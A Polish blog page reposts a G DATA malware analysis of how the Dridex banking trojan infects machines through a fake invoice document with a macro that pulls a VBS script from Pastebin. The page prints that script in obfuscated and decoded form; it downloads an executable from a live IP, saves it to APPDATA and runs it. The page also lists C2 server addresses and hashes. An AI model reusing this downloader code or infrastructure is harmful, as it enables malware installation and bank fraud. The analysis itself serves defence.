Genesis Krypton 700

Bardzo kolorowa mysz

Więcej...

Genesis Vanad 750

Mouse bungee godny uwagi

Więcej...

DOD LS475W

Wideorejestrator samochodowy z GPS

Więcej...

Cooler Master MasterMouse S

Prosta mysz dla graczy

Więcej...

Genesis Radon 600 Virtual 7.1 Headset

Słuchawki z dźwiękiem 7,1

Więcej...

Ciekawe statystyki


W naszym kraju telefon komórkowy ma już 74% Polaków, czyli 28,4 miliona osób. Z kolei 6,6 miliona z nich gra w gry mobilne.
Obecnie gracze najchętniej  wykorzystują podczas gamingu komputery PC (ponad 80%), jednak badanie AVM pokazuje bardzo szybki rozwój i wzrost zainteresowania grami na urządzeniach mobilnych. 
Z raportu BSA Global Software Survey opublikowanego w 2014 roku wynika, że 51 proc. oprogramowania zainstalowanego w Polsce w poprzednim roku nie miało licencji, w porównaniu z 43 proc. w skali ...
Rynek aplikacji i gier mobilnych w 2016 roku będzie wart 44,8 mld dolarów i ponad 80 mld w 2020 roku Rynek aplikacji i gier mobilnych w 2016 roku będzie wart 44,8 mld dolarów i ponad 80 mld w 2020 roku
Według najnowszych prognoz Newzoo, rynek gier i aplikacji mobilnych wygeneruje w 2016 roku przychód na poziomie 44,8 mld dolarów a w 2020 ponad 80 miliardów dolarów.
Według danych przywoływanych przez Urząd Komunikacji Elektronicznej przeciętny aktywny użytkownik w Polsce wysyła 83 SMS-y miesięcznie.

Kalendarz

Pn Wt Śr Cz Pt So N
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

Sklep z dronami

Gearbest  promotion

Podziel się ze mną swoimi uwagami na temat mojego bloga, co Ci się podoba, co Ci się nie podoba, jakie recenzje chciałbyś tu zobaczyć itp.

Kliknij mnie

 

G DATA: Dridex – wykryta metoda infekcji

Autorzy bankowych trojanów wykorzystują sztuczki z wykorzystaniem pakietu Microsoft Office, aby zainfekować systemy.

Twórcy bankowych trojanów, aby oszukać użytkowników, a tym samym ominąć różnego rodzaju zabezpieczenia, wykazują się coraz większą kreatywnością,. Eksperci G DATA SecurityLabs dokonali analizy specjalnie spreparowanego dokumentu programu Microsoft Word, który posłużył do instalacji złośliwego trojana bankowego o nazwie Dridex. Ten złośliwy dokument powoduje, że nieświadomy użytkownik łączy się ze stroną internetową i pobiera złośliwe oprogramowanie. Tego typu ataki coraz częściej są wymierzone przeciwko firmom, zwłaszcza MSP, w różnych częściach globu.

Infekcja krok po kroku

Krok 1: Kampania spamowa.
Proces rozpoczyna się od wysłania tysięcy e-maili do potencjalnych ofiar, zawierających informacje o rzekomym zamówieniu. W załączniku znajduje się dokument Microsoft Office z fałszywą fakturą.

Krok 2. Otwarcie dokumentu Microsoft Office
Dokument nazywa się YU96260LFZ.doc natomiast Secure Hash Algorithm, dzięki któremu można dokładnie określić i zidentyfikować plik, przedstawia się następująco:

SHA256 e2d878a43607c04f151052e81a560a80525a343ea4e719c3a79e1cc8c45e47c5

Nazwa rozszerzenia sugeruje, że mamy do czynienia z plikiem typu .doc, jednak w rzeczywistości jest to dokument MHTML. To standard dodawania zasobów, które w normalnych stronach HTTP są pobierane z zewnątrz, takich jak obrazy lub pliki dźwiękowe, do tego samego pliku co kod HTML. Protokół jest wspierany przez Microsoft Word, używający rozszerzenia mht. Zakładamy, że napastnik oryginalnie wygenerował plik .mht i zamienił rozszerzenie na .doc. Dlaczego? Cyberprzestępcy używają znanych i popularnych rozszerzeń, bowiem użytkownicy nie obawiają się otwierać dokumentów ze znanymi końcówkami. Ponadto pliki .mht oraz .doc dzielą tę samą ikonę, w rezultacie użytkownicy stają się mniej podejrzliwi.

Poniższy dokument zawiera makro. Kiedy użytkownik otworzy dokument widzi następującą wiadomość.

Komunikat na samej górze informuje, że makro jest wyłączone, co jest dobrą informacją dla użytkownika. Pozostałe trzy linijki są kompletnie nieczytelne. Warto także zwrócić uwagę na wpis „If you document has ……” zawiera błąd gramatyczny – zamiast „you” powinno pojawić się „your”.
Co się dzieje dalej? Oczywiście uruchomienie makra, powoduje, że użytkownik pobiera złośliwy kod.
paul@gdata:~/ $ oledump.py -p plugin_http_heuristics.py file.mso
1: 541 'PROJECT'
2: 98 'PROJECTwm'
3: m 818 'VBA/Module2'
Plugin: HTTP Heuristics plugin
Module2
4: M 1607 'VBA/ThisDocument'
Plugin: HTTP Heuristics plugin
'N\x18\xac\x0e\x87.\x99\xe9\xed'
5: 3262 'VBA/_VBA_PROJECT'
6: 627 'VBA/dir'
7: M 5305
'VBA/\xd0\xb0\xd1\x86\xd1\x83\xd0\xba34\xd0\xba\xd1\x86\xd1\x83\xd0\xbc'
Plugin: HTTP Heuristics plugin
hxxp://pastebin.com/download.php?i=VTd9HVkz
Pastebin.com to strona internetowa umożliwiające tymczasowe przechowywanie dokumentów tekstowych oraz możliwość ich współdzielenia, poprzez udostępnianie linku. Gro użytkowników serwisu stanowią developerzy przechowujący kody źródłowe, co jeszcze bardziej go uwiarygodnia w oczach potencjalnych ofiar. Poza tym wygodna i przejrzysta obsługa serwisu znacznie ułatwia zadanie cyberprzestępcom.

Krok 3. Payload hostowany na Pastebin.com
Dokument tekstowy skonfigurowany przez napastników jest udostępniany jako skrypt VBS (Visual Basic Script). Skrypt został zamaskowany w dość prosty sposób . Poniżej zamieszczamy początek zakamuflowanego kodu:

dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) &
Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) &
Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) &
Chr(84) & Chr(80) )
dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) &
Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
HGyu87f7Usf.Send
Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) &
Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) &
Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
with oUIOGuiwefff
.type = 1
.open
.write HGyu87f7Usf.responseBody
.savetofile iyUGUIvbuiwe7vhJ, 2
end with
Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) &
Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) ) uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ

Poniżej odmaskowany kod:

dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
HGyu87f7Usf.Send
Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
iyUGbuwerff = dfgfderer(APPDATA )
iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
with oUIOGuiwefff
.type = 1
.open
.write HGyu87f7Usf.responseBody
.savetofile iyUGUIvbuiwe7vhJ, 2
end with
Set uyGUYhi8wef = CreateObject(Shell.Application )
uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ

VBS został pobrany i wykonany (the/get.php link) zainstalowany w %APPDATA% jako plik o nazwie o8237423.exe.

Krok 4. Downloader & payload
Plik o8237423.exe to downloader. Zanim się uruchomi, dąży do uzyskania uprawnień administratora przez ominięcie UAC ( Kontrola konta użytkownika). Downloader wykonuje to zadanie, wykorzystując popularny trik polegający na ukryciu okienka UAC. W tym celu posługuje się plikiem .sdb, Więcej informacji na temat UAC można znaleźć na stronie ttps://support.microsoft.com/en-us/kb/3045645. Uaktualnienie, o którym informuje Microsoft, określa się jako opcjonalne. Jednak zalecamy jego zastosowanie, aby zapobiec opisanym powyżej próbom oszustwa.
Pobrany komponent generuje konfigurację wymaganą do działania i rozprzestrzeniania trojana Dridex. Więcej informacji o bankowych trojanach można znaleźć na stronie .. https://secure.gd/dl-en-pcmwr201402.

Poniżej znajduje się przykładowa konfiguracja próbki Trojana, który zaatakował użytkowników we Francji i Wielkiej Brytanii.

<config
botnet_id=120
Servers= 46.36.217.227:3443, 159.253.20.116:4443, 5.44.216.44:1443, 91.218.228.25:8443
/>

Ostatecznie biblioteka (payload) została pobrana z jednego serwerów, wymienionych w konfiguracji. Hash tej biblioteki przedstawia się następująco: 0305dda6ec81e8d8ff90152094d5e5e0f8914aeb6d984ee48d72f405a9b90f90 i jest dopasowany do głównego payloadu trojana Dridex.

Przykłady ataków trojana Dridex w różnych krajach
Słyszeliśmy i czytaliśmy o kilku przypadkach , kiedy ataki przeprowadzane za pomocą Dridexa zakończyły się sukcesem, czyli kradzieżą pieniędzy z firmowych kont, najczęściej dotyczyły one MSP. W maju Trojan wykazywał się szczególnie dużą aktywnością w Belgii, gdzie zainfekował 35 tys. maszyn wykorzystujących specjalistyczne systemy bankowe. Również media we Francji szeroko informowały o pojawieniu się zagrożenia Dridex.

Wnioski
Cyberprzestępcy ciągle poszukują innowacyjnych metod pozwalających uśpić czujność ludzką i ominąć systemy bezpieczeństwa.. W tym celu wykorzystują zaufane serwisy internetowe oraz niestandardowe dokumenty Microsoft Office. Produkty G DATA doskonale współpracują z innymi aplikacjami i wykrywają wszelkie podejrzane działania. Technologia G DATA BankGuard chroni komputery przed trojanami bankowym, w tym Dridexem. Wreszcie, twórcy szkodliwego oprogramowania wykorzystują słabości systemu operacyjnego Microsoft, takie jak luki w UAC. Dlatego zalecamy instalację poprawki KB3045645, niezależnie od rekomendacji Microsoftu.

Poza tym bez przerwy apelujemy do użytkowników, żeby nie otwierać załączników e-maili pochodzących od nieznanych nadawców oraz nie uruchamiać makr w obcych dokumentach.

W ciągu ostatnich miesięcy mieliśmy do czynienia z wieloma incydentami, które pokazują, że napastnicy próbują oszukać użytkowników, posługując się znanymi i zaufanymi programami Wiele osób uważa, że są one nieszkodliwe i nic im z ich strony nie grozi, co wcale nie jest oczywiste. Dlatego miejcie oczy otwarte i zachowajcie czujność.

Porady
Zalecamy, aby nigdy nie otwierać załączników otrzymanych od nieznanego nadawcy. Należy wykazywać się szczególnie dużą ostrożnością, kiedy w ten sposób przesyłane są faktury. Przed otwarciem załącznika trzeba zadać sobie kilka pytań:

  • Czy naprawdę coś zamawiałem?
  • Czy strona, z której korzystam, aby złożyć zamówienie, używa takiego samego języka podczas komunikacji e-mail. (Właściciel polskojęzycznej strony prześle wiadomość w języku polskim, a nie angielskim)
  • Czy e-mail zawiera błędy ortograficzne bądź dziwną składnię?
  • Czy e-mail zawiera dane osobiste, takie jak moje prawdziwe nazwisko, adres, numer dowodu itp.?
  • Jeśli masz jakiekolwiek wątpliwości, nie otwieraj załącznika.

 

Znajdziesz mnie:

Sign in with Google+ Subscribe on YouTube